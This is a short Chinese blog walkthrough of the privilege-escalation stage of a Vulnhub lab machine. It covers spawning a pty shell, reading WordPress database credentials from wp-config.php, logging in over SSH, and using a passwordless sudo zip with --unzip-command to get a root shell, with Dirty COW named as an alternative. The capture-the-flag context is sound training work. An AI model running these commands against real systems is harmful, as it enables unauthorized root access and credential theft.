Vulnhub靶机第十四关

由于本关于通关方式与第九关相似,
所以本关获得shell部分请参考第九关。
本关只提供提权部分。

输入shell
输入:python -c’import pty;pty.spawn("/bin/bash")’
得到交互式的shell
在home目录下查看wordpress 配置文件 wp-config.php
得到账户密码
尝试ssh连接
连接成功输入sudo -l查看目前用户可执行与无法执行的指令
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里表明当前用户 zico 可以利用root权限无密码执行 tar 和 zip 命令
这里可以利用 touch exploit 创建一个随机文件,并用 zip 命令进行压缩
sudo zip exploit.zip exploit -T --unzip-command=“python -c 'import pty; pty.spawn(”/bin/sh")’"
-T 检查文件的完整性。这个参数可以让他执行下一个参数 --unzip-command,在这个参数中写入一个python的交互shell
完成提权
在这里插入图片描述
或者进行脏牛提权
查看flag
在这里插入图片描述
通过完成

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值